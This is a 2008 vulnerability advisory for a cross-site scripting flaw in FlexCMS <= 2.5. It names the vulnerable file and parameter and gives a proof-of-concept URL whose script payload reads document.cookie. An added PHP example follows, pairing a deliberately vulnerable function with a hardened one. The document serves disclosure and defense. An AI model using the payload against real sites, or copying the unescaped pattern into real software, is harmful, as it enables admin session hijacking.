Information Security

From: irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date: 18 August 2008
Subject: FlexCMS <= 2.5 Cross Site Scripting Vulnerability

----------------------------------------------------------------

Script : FlexCMS <= 2.5

Type : Cross Site Scripting Vulnerability

Alert : Low

----------------------------------------------------------------

Download From : http://www.flexcms.com/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability :

File Name : inc-core-admin-editor-previouscolorsjs.php

Vulnerable Variable : PreviousColorsString

Send Method : GET

Register_globals : On

Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');';

Address :
http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script>

An attacker can hijack the admin cookie with this vulnerability ....

Solution for patch : filter the PreviousColorsString variable with the htmlspecialchars() function ...


----------------------------------------------------------------

                       Tnx : God

                    HTTP://IRCRASH.COM

----------------------------------------------------------------
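As an added example (not from the advisory above and not FlexCMS code), the vulnerable pattern the advisory describes beside a hardened version. The file and variable names are the ones the advisory quotes; the function names and the wrapping around `$_GET` are assumptions. The point worth seeing is that the value crosses two contexts, a JavaScript string literal and then the HTML sink `document.write()`, so it needs an encoding for each.

```php
<?php
// Added example, not FlexCMS code. Both functions return the JavaScript the
// page would emit, so the two outputs can be compared without a browser.

// Vulnerable pattern as described in the advisory: with register_globals on,
// $PreviousColorsString arrives straight from ?PreviousColorsString=... and is
// printed into a JS string literal with no encoding at all.
function previousColorsJsVulnerable(string $PreviousColorsString): string
{
    return "document.write('" . $PreviousColorsString . "');";
}

// Hardened version (assumed helper, not the project's own fix).
// 1. Read the parameter explicitly so nothing depends on register_globals.
// 2. HTML-encode for the document.write() sink, which parses its argument
//    as markup at runtime (this is the htmlspecialchars() step the
//    advisory suggests; ENT_QUOTES also covers single quotes).
// 3. Encode for the JS string-literal context with json_encode(); the
//    JSON_HEX_* flags turn any remaining < > ' " & into \uXXXX escapes so
//    the value can neither close the literal nor a surrounding <script>.
// Step 2 alone leaves the quote breakout; step 3 alone is undone when the
// browser decodes the \uXXXX escapes and hands real markup to document.write.
function previousColorsJsHardened(array $get): string
{
    $raw = $get['PreviousColorsString'] ?? '';
    $value = is_string($raw) ? $raw : '';

    $htmlSafe = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    $jsLiteral = json_encode(
        $htmlSafe,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
    );

    return 'document.write(' . $jsLiteral . ');';
}

// Constructed input equivalent to the advisory's proof of concept.
$payload = '<script>alert(document.cookie)</script>';

echo previousColorsJsVulnerable($payload), PHP_EOL;
echo previousColorsJsHardened(['PreviousColorsString' => $payload]), PHP_EOL;
```

Run with `php` on the command line and compare the two lines: the first hands the browser live markup, the second only ever yields text.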
